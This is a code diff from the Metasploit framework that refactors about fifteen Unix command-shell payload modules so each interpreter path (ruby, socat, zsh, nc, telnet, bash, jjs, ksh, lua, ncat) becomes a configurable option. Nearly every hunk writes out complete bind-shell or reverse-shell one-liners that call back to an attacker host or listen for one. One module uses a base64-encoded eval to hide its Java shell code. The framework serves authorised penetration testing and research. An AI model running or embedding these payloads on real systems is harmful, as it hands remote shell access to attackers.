-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Bind TCP (via Ruby)',
+     'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
  end

  def generate(_opts = {})
@@ -33,6 +38,6 @@ module MetasploitModule
  end

  def command_string
-    "ruby -rsocket -e 'exit if fork;s=TCPServer.new(\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
+    "#{datastore['RubyPath']} -rsocket -e 'exit if fork;s=TCPServer.new(\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
  end
 end
@@ -13,18 +13,23 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via Ruby) IPv6',
-      'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Bind TCP (via Ruby) IPv6',
+     'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
  end

  def generate(_opts = {})
@@ -33,6 +38,6 @@ module MetasploitModule
  end

  def command_string
-    "ruby -rsocket -e 'exit if fork;s=TCPServer.new(\"::\",\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
+    "#{datastore['RubyPath']} -rsocket -e 'exit if fork;s=TCPServer.new(\"::\",\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
  end
 end
@@ -13,22 +13,28 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind UDP (via socat)',
-      'Description'   => 'Creates an interactive shell via socat',
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindUdp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'socat',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind UDP (via socat)',
+     'Description'   => 'Creates an interactive shell via socat',
+     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindUdp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'socat',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+          ))
+    register_advanced_options(
+      [
+        OptString.new('SocatPath', [true, 'The path to the Socat executable', 'socat']),
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash'])
+      ]
+    )
  end

  #
@@ -43,7 +49,7 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "socat udp-listen:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+    "#{datastore['SocatPath']} udp-listen:#{datastore['LPORT']} exec:'#{datastore['BashPath']} -li',pty,stderr,sane 2>&1>/dev/null &"
  end

 end
@@ -13,29 +13,34 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via Zsh)',
-      'Description'   => %q{
+     'Name'          => 'Unix Command Shell, Bind TCP (via Zsh)',
+     'Description'   => %q{
        Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
        often available, please be aware it isn't usually installed by default.
      },
-      'Author'        =>
-        [
-          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
-          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'zsh',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Author'        =>
+       [
+         'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+         'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'zsh',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('ZSHPath', [true, 'The path to the ZSH executable', 'zsh'])
+      ]
+    )
  end

  #
@@ -49,6 +54,6 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "zsh -c 'zmodload zsh/net/tcp && ztcp -l #{datastore['LPORT']} && ztcp -a $REPLY && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
+    "#{datastore['ZSHPath']} -c 'zmodload zsh/net/tcp && ztcp -l #{datastore['LPORT']} && ztcp -a $REPLY && #{datastore['ZSHPath']} >&$REPLY 2>&$REPLY 0>&$REPLY'"
  end
 end
@@ -14,20 +14,25 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
-      'Description'   => 'Accept a connection, send a UUID, then exit',
-      'Author'        =>
-        [
-          'asoto-r7'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::Pingback,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat'
+     'Name'          => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
+     'Description'   => 'Accept a connection, send a UUID, then exit',
+     'Author'        =>
+       [
+         'asoto-r7'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::Pingback,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat'
    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc'])
+      ]
+    )
  end

  #
@@ -42,6 +47,6 @@ module MetasploitModule
  #
  def command_string
    self.pingback_uuid ||= self.generate_pingback_uuid
-    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (nc -lp #{datastore['LPORT']} || nc -l #{datastore['LPORT']})"
+    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (#{datastore['NetcatPath']} -lp #{datastore['LPORT']} || #{datastore['NetcatPath']} -l #{datastore['LPORT']})"
  end
 end
@@ -14,20 +14,25 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Pingback Reverse TCP (via netcat)',
-      'Description'   => 'Creates a socket, send a UUID, then exit',
-      'Author'        =>
-        [
-          'asoto-r7'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::Pingback,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat'
+     'Name'          => 'Unix Command Shell, Pingback Reverse TCP (via netcat)',
+     'Description'   => 'Creates a socket, send a UUID, then exit',
+     'Author'        =>
+       [
+         'asoto-r7'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::Pingback,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat'
    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc'])
+      ]
+    )
  end

  #
@@ -42,6 +47,6 @@ module MetasploitModule
  #
  def command_string
    self.pingback_uuid ||= self.generate_pingback_uuid
-    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | nc #{datastore['LHOST']} #{datastore['LPORT']}"
+    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | #{datastore['NetcatPath']} #{datastore['LHOST']} #{datastore['LPORT']}"
  end
 end
@@ -13,22 +13,28 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Double Reverse TCP (telnet)',
-      'Description'   => 'Creates an interactive shell through two inbound connections',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpDouble,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnet',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Double Reverse TCP (telnet)',
+     'Description'   => 'Creates an interactive shell through two inbound connections',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpDouble,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'telnet',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('TelnetPath', [true, 'The path to the telnet executable', 'telnet']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
  end

  #
@@ -44,11 +50,11 @@ module MetasploitModule
  #
  def command_string
    cmd =
-      "sh -c '(sleep #{3600+rand(1024)}|" +
-      "telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
-      "while : ; do sh && break; done 2>&1|" +
-      "telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
-      " >/dev/null 2>&1 &)'"
+      "#{datastore['ShellPath']} -c '(sleep #{3600+rand(1024)}|" +
+        "#{datastore['TelnetPath']} #{datastore['LHOST']} #{datastore['LPORT']}|" +
+        "while : ; do #{datastore['ShellPath']} && break; done 2>&1|" +
+        "#{datastore['TelnetPath']} #{datastore['LHOST']} #{datastore['LPORT']}" +
+        " >/dev/null 2>&1 &)'"
    return cmd
  end
 end
@@ -13,28 +13,34 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (/dev/tcp)',
-      'Description'   => %q{
+     'Name'          => 'Unix Command Shell, Reverse TCP (/dev/tcp)',
+     'Description'   => %q{
        Creates an interactive shell via bash's builtin /dev/tcp.

        This will not work on circa 2009 and older Debian-based Linux
        distributions (including Ubuntu) because they compile bash
        without the /dev/tcp feature.
      },
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd_bash',
-      'RequiredCmd'   => 'bash-tcp',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd_bash',
+     'RequiredCmd'   => 'bash-tcp',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
  end

  #
@@ -50,7 +56,7 @@ module MetasploitModule
  #
  def command_string
    fd = rand(200) + 20
-    return "bash -c '0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}'";
+    return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'";
    # same thing, no semicolons
    #return "/bin/bash #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"
    # same thing, no spaces
@@ -13,27 +13,32 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
-      'Description'   => %q{
+       'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
+       'Description'   => %q{
        Creates an interactive shell via mkfifo and telnet.
        This method works on Debian and other systems compiled
        without /dev/tcp support. This module uses the '-z'
        option included on some systems to encrypt using SSL.
        },
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnet',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+       'License'       => MSF_LICENSE,
+       'Platform'      => 'unix',
+       'Arch'          => ARCH_CMD,
+       'Handler'       => Msf::Handler::ReverseTcpSsl,
+       'Session'       => Msf::Sessions::CommandShell,
+       'PayloadType'   => 'cmd',
+       'RequiredCmd'   => 'telnet',
+       'Payload'       =>
+         {
+           'Offsets' => { },
+           'Payload' => ''
+         }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('TelnetPath', [true, 'The path to the telnet executable', 'telnet'])
+      ]
+    )
  end

  #
@@ -49,6 +54,6 @@ module MetasploitModule
  #
  def command_string
    pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
-    "mkfifo #{pipe_name} && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+    "mkfifo #{pipe_name} && #{datastore['TelnetPath']} -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
  end
 end
@@ -13,31 +13,37 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse UDP (/dev/udp)',
-      'Description'   => %q{
-        Creates an interactive shell via bash's builtin /dev/udp.
+     'Name'          => 'Unix Command Shell, Reverse UDP (/dev/udp)',
+     'Description'   => %q{
+          Creates an interactive shell via bash's builtin /dev/udp.

-        This will not work on circa 2009 and older Debian-based Linux
-        distributions (including Ubuntu) because they compile bash
-        without the /dev/udp feature.
-      },
-      'Author'        => [
-        'hdm',   # Reverse bash TCP
-        'bcoles' # Reverse bash UDP
-      ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseUdp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd_bash',
-      'RequiredCmd'   => 'bash-udp',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+          This will not work on circa 2009 and older Debian-based Linux
+          distributions (including Ubuntu) because they compile bash
+          without the /dev/udp feature.
+          },
+     'Author'        => [
+       'hdm',   # Reverse bash TCP
+       'bcoles' # Reverse bash UDP
+     ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseUdp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd_bash',
+     'RequiredCmd'   => 'bash-udp',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
  end

  #
@@ -53,7 +59,7 @@ module MetasploitModule
  #
  def command_string
    fd = rand(200) + 20
-    return "bash -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}'";
+    return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'";

    # no semicolons
    #return "sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
@@ -13,29 +13,36 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via jjs)',
-      'Description' => 'Connect back and create a command shell via jjs',
-      'Author'      => [
-        'conerpirate', # jjs reverse shell
-        'bcoles'       # metasploit
-      ],
-      'References'    => [
-        ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
-        ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
-        ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
-      ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'jjs',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP (via jjs)',
+     'Description' => 'Connect back and create a command shell via jjs',
+     'Author'      => [
+       'conerpirate', # jjs reverse shell
+       'bcoles'       # metasploit
+     ],
+     'References'    => [
+       ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
+       ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+       ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
+     ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'jjs',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
-    register_options [
-      OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
-    ]
+    register_options(
+      [
+        OptString.new('SHELL', [ true, 'The shell to execute', '/bin/sh' ])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('JJSPath', [true, 'The path to the JJS executable', 'jjs'])
+      ]
+    )
  end

  def generate(_opts = {})
@@ -64,8 +71,8 @@ module MetasploitModule
      };
      p.destroy();s.close();
  }
-  minified = jcode.split("\n").map(&:lstrip).join
+    minified = jcode.split("\n").map(&:lstrip).join

-  %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
+    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|#{datastore['JJSPath']}}
  end
 end
@@ -13,21 +13,26 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via Ksh)',
-      'Description' => %q{
+     'Name'        => 'Unix Command Shell, Reverse TCP (via Ksh)',
+     'Description' => %q{
        Connect back and create a command shell via Ksh.  Note: Although Ksh is often
        available, please be aware it isn't usually installed by default.
      },
-      'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ksh',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ksh',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
+    register_advanced_options(
+      [
+        OptString.new('KSHPath', [true, 'The path to the KSH executable', 'ksh'])
+      ]
+    )
  end

  def generate(_opts = {})
@@ -35,6 +40,6 @@ module MetasploitModule
  end

  def command_string
-    "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
+    "#{datastore['KSHPath']} -c '#{datastore['KSHPath']} >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
  end
 end
@@ -13,25 +13,30 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (via Lua)',
-      'Description'   => 'Creates an interactive shell via Lua',
-      'Author'        =>
-      [
-        'xistence <xistence[at]0x90.nl>',
-      ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'lua',
-      'Payload'       =>
-      {
-        'Offsets' => { },
-        'Payload' => ''
-      }
+     'Name'          => 'Unix Command Shell, Reverse TCP (via Lua)',
+     'Description'   => 'Creates an interactive shell via Lua',
+     'Author'        =>
+       [
+         'xistence <xistence[at]0x90.nl>',
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'lua',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
    ))
+    register_advanced_options(
+      [
+        OptString.new('LuaPath', [true, 'The path to the Lua executable', 'lua'])
+      ]
+    )
  end

  #
@@ -46,7 +51,7 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
+    "#{datastore['LuaPath']} -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
  end
 end

@@ -13,22 +13,28 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via ncat)',
-      'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode',
-      'Author'      => 'C_Sto',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcpSsl,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ncat',
-      'Payload'     =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'        => 'Unix Command Shell, Reverse TCP (via ncat)',
+     'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode',
+     'Author'      => 'C_Sto',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcpSsl,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ncat',
+     'Payload'     =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NcatPath', [true, 'The path to the NCat executable', 'ncat']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
  end

  #
@@ -42,6 +48,6 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "ncat -e /bin/sh --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
+    "#{datastore['NcatPath']} -e #{datastore['ShellPath']} --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
  end
 end
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.2
 .0.5